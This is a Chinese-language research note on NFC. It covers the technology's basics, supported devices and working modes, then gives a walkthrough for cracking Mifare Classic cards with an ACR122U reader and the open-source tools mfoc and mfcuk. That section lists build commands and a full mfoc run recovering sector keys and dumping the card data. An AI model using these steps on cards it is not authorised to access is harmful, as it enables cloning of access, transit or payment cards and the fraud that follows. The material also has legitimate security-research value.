NFC Research
目录 |
1 概述
NFC 即 Near Field Communication,即近距离无线通讯技术。允许电子设备之间进行非接触式点对点数据传输,在十厘米(3.9英吋)内交换数据。
这个技术由 RFID 演变而来,由飞利浦半导体(现恩智浦半导体,NXP)、诺基亚和索尼共同研制开发,其基础是 RFID 及互连技术。
近场通信是一种短距高频的无线电技术,在13.56MHz频率运行于20厘米距离内。其传输速度有 106 Kbit/s、212 Kbit/s 或者 424 Kbit/s 三种。
目前近场通信已通过成为ISO/IEC IS 18092国际标准、EMCA-340标准与ETSI TS 102 190标准
NFC 向下兼容向下 RFID,其将非接触读卡器、非接触卡和点对点功能整合进一块单芯片,通俗的说 NFC 就是 RFID 的演进版本
2 设备
- ACS 122U
- 使用广泛的 NFC 读卡器(USB 接口)
- 带 NFC 的手机
- 魅族 MX3
- Oppop Find 5
- 小米2A,小米3
- SONY Xperia V LT25i
- Samsung Galaxy Note 3、Galaxy Note 2、Galaxy Note、Galaxy S2、Galaxy S3、Galaxy S4
- Nokia Lumia720、Lumia 820、Lumia 920 以及 Lumia925、Lumia928 和 Lumia1020
- proxmark3
3 工作模式
卡模式(Card emulation):这个模式其实就是相当于一张采用 RFID 技术的IC卡。可以替代现在大量的IC卡(包括信用卡)场合商场刷卡、悠游卡、门禁管制,车票,门票等等。此种方式下,有一个极大的优点,那就是卡片通过非接触读卡器的 RF 域来供电,即便是寄主设备(如手机)没电也可以工作
点对点模式(P2P mode):这个模式和红外线差不多,可用于数据交换,只是传输距离较短,传输创建速度较快,传输速度也快些,功耗低(蓝牙也类似)。将两个具备NFC功能的设备链接,能实现数据点对点传输,如下载音乐、交换图片或者同步设备地址薄
读卡器模式(Reader/writer mode):作为非接触式读卡器使用,比如读取市政交通一卡通的余额和交易记录,从海报或者展览信息电子标签上读取相关信息等
4 解码
Mifare 1 S50 (1K EEPROM) 和 Mifare 1 S70 (4K EEPROM) 早以被全面爆破,现在最新的应用都是 Mifare DESFire
硬件: ACR 122U,人民币 200 左右
软件: 开源工具
- 扫 keys: mfoc http://code.google.com/p/mfoc/
- 爆破一个区的 key: mfcuk http://code.google.com/p/mfcuk/
- Mifare Classic Card 辅助工具: mfterm https://github.com/4ZM/mfterm
- 核心支持库: libnfc http://code.google.com/p/libnfc/
1. 编译
$ wget http://libnfc.googlecode.com/files/libnfc-1.7.0.tar.bz2 $ tar jxf libnfc-1.7.0.tar.bz2 $ cd libnfc-1.7.0 $ ./configure # 默认使用的 ACR122U 的 driver 是 acr122_usb,直接USB通讯而不是通过 acr122_pcsc 这个driver 去通过中间件 PCSC 支持读卡器 $ make $ sudo make install $ wget http://mfoc.googlecode.com/files/mfoc-0.10.6.tar.gz && tar -xvzf mfoc-0.10.6.tar.gz $ cd mfoc-0.10.6 $ ./configure $ make $ sudo make install $ git clone git://github.com/4ZM/mfterm $ cd mfterm $ ./autogen.sh $ ./configure $ make $ sudo make install mfcuk 同理,编译过程中缺库,补上即可
2. 爆破
确认系统发现 ACR122U:
$ nfc-list nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d error libnfc.driver.acr122_usb Unable to claim USB interface (Operation not permitted) nfc-list: ERROR: Unable to open NFC device: acr122_usb:001:009 $ sudo nfc-list nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d NFC device: ACS / ACR122U PICC Interface opened 在 vmware 虚拟机上没法工作,老出现 Unable to write USB interface 错误
开始扫所有 Sector 的 key:
$ sudo mfoc -P 500 -O dump.card.file ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 02 * UID size: single * bit frame anticollision supported UID (NFCID1): 25 55 aa 10 SAK (SEL_RES): 18 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 4K * MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1 * SmartMX with MIFARE 4K emulation Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: ffffffffffff] -> [........................................] [Key: a0a1a2a3a4a5] -> [/.......................................] [Key: d3f7d3f7d3f7] -> [/.......................................] [Key: 000000000000] -> [/.......................................] [Key: b0b1b2b3b4b5] -> [/.......................................] [Key: 4d3a99c351dd] -> [/.......................................] [Key: 1a982c7e459a] -> [/.......................................] [Key: aabbccddeeff] -> [/.......................................] [Key: 714c5c886e97] -> [/.......................................] [Key: 587ee5f9350f] -> [/.......................................] [Key: a0478cc39091] -> [/.......................................] [Key: 533cb6c723f6] -> [/.......................................] [Key: 8fd0a4f256e9] -> [/.......................................] Sector 00 - FOUND_KEY [A] Sector 00 - UNKNOWN_KEY [B] Sector 01 - UNKNOWN_KEY [A] Sector 01 - UNKNOWN_KEY [B] Sector 02 - UNKNOWN_KEY [A] Sector 02 - UNKNOWN_KEY [B] Sector 03 - UNKNOWN_KEY [A] Sector 03 - UNKNOWN_KEY [B] Sector 04 - UNKNOWN_KEY [A] Sector 04 - UNKNOWN_KEY [B] Sector 05 - UNKNOWN_KEY [A] Sector 05 - UNKNOWN_KEY [B] Sector 06 - UNKNOWN_KEY [A] Sector 06 - UNKNOWN_KEY [B] Sector 07 - UNKNOWN_KEY [A] Sector 07 - UNKNOWN_KEY [B] Sector 08 - UNKNOWN_KEY [A] Sector 08 - UNKNOWN_KEY [B] Sector 09 - UNKNOWN_KEY [A] Sector 09 - UNKNOWN_KEY [B] Sector 10 - UNKNOWN_KEY [A] Sector 10 - UNKNOWN_KEY [B] Sector 11 - UNKNOWN_KEY [A] Sector 11 - UNKNOWN_KEY [B] Sector 12 - UNKNOWN_KEY [A] Sector 12 - UNKNOWN_KEY [B] Sector 13 - UNKNOWN_KEY [A] Sector 13 - UNKNOWN_KEY [B] Sector 14 - UNKNOWN_KEY [A] Sector 14 - UNKNOWN_KEY [B] Sector 15 - UNKNOWN_KEY [A] Sector 15 - UNKNOWN_KEY [B] Sector 16 - UNKNOWN_KEY [A] Sector 16 - UNKNOWN_KEY [B] Sector 17 - UNKNOWN_KEY [A] Sector 17 - UNKNOWN_KEY [B] Sector 18 - UNKNOWN_KEY [A] Sector 18 - UNKNOWN_KEY [B] Sector 19 - UNKNOWN_KEY [A] Sector 19 - UNKNOWN_KEY [B] Sector 20 - UNKNOWN_KEY [A] Sector 20 - UNKNOWN_KEY [B] Sector 21 - UNKNOWN_KEY [A] Sector 21 - UNKNOWN_KEY [B] Sector 22 - UNKNOWN_KEY [A] Sector 22 - UNKNOWN_KEY [B] Sector 23 - UNKNOWN_KEY [A] Sector 23 - UNKNOWN_KEY [B] Sector 24 - UNKNOWN_KEY [A] Sector 24 - UNKNOWN_KEY [B] Sector 25 - UNKNOWN_KEY [A] Sector 25 - UNKNOWN_KEY [B] Sector 26 - UNKNOWN_KEY [A] Sector 26 - UNKNOWN_KEY [B] Sector 27 - UNKNOWN_KEY [A] Sector 27 - UNKNOWN_KEY [B] Sector 28 - UNKNOWN_KEY [A] Sector 28 - UNKNOWN_KEY [B] Sector 29 - UNKNOWN_KEY [A] Sector 29 - UNKNOWN_KEY [B] Sector 30 - UNKNOWN_KEY [A] Sector 30 - UNKNOWN_KEY [B] Sector 31 - UNKNOWN_KEY [A] Sector 31 - UNKNOWN_KEY [B] Sector 32 - UNKNOWN_KEY [A] Sector 32 - UNKNOWN_KEY [B] Sector 33 - UNKNOWN_KEY [A] Sector 33 - UNKNOWN_KEY [B] Sector 34 - UNKNOWN_KEY [A] Sector 34 - UNKNOWN_KEY [B] Sector 35 - UNKNOWN_KEY [A] Sector 35 - UNKNOWN_KEY [B] Sector 36 - UNKNOWN_KEY [A] Sector 36 - UNKNOWN_KEY [B] Sector 37 - UNKNOWN_KEY [A] Sector 37 - UNKNOWN_KEY [B] Sector 38 - UNKNOWN_KEY [A] Sector 38 - UNKNOWN_KEY [B] Sector 39 - UNKNOWN_KEY [A] Sector 39 - UNKNOWN_KEY [B] Using sector 00 as an exploit sector Sector: 1, type A, probe 0, distance 15105 ..... Sector: 1, type A, probe 1, distance 15147 ..... Found Key: A [2c5a3710d3a5] Sector: 2, type A, probe 0, distance 15147 ..... Found Key: A [c3a4fa8db109] Sector: 3, type A, probe 0, distance 15147 ..... Found Key: A [3c34515b11d4] Sector: 4, type A, probe 0, distance 15149 ..... Found Key: A [0725a08f31e6] Sector: 5, type A, probe 0, distance 15151 ..... Found Key: A [5601f83644bb] Sector: 6, type A, probe 0, distance 15149 ..... Sector: 6, type A, probe 1, distance 15149 ..... Sector: 6, type A, probe 2, distance 15149 ..... Found Key: A [20f2bf55ac1a] Sector: 7, type A, probe 0, distance 15147 ..... Found Key: A [dd77fb8c3736] Sector: 8, type A, probe 0, distance 15149 ..... Sector: 8, type A, probe 1, distance 15147 ..... Found Key: A [c2180972c580] Sector: 9, type A, probe 0, distance 15151 ..... Found Key: A [742c582e8c04] Sector: 10, type A, probe 0, distance 15151 ..... Sector: 10, type A, probe 1, distance 15193 ..... Sector: 10, type A, probe 2, distance 15151 ..... Found Key: A [db338f92bb98] Sector: 11, type A, probe 0, distance 15151 ..... Found Key: A [15559907e873] Sector: 12, type A, probe 0, distance 15151 ..... Found Key: A [c8313c454d2a] Sector: 13, type A, probe 0, distance 15149 ..... Sector: 13, type A, probe 1, distance 15149 ..... Found Key: A [c896c22e5b3e] Sector: 14, type A, probe 0, distance 15149 ..... Found Key: A [72558e3fe66c] Sector: 15, type A, probe 0, distance 15151 ..... Found Key: A [aec383ce3c12] ...... ......
完成后会把整个数据写入 dump.card.file 这个文件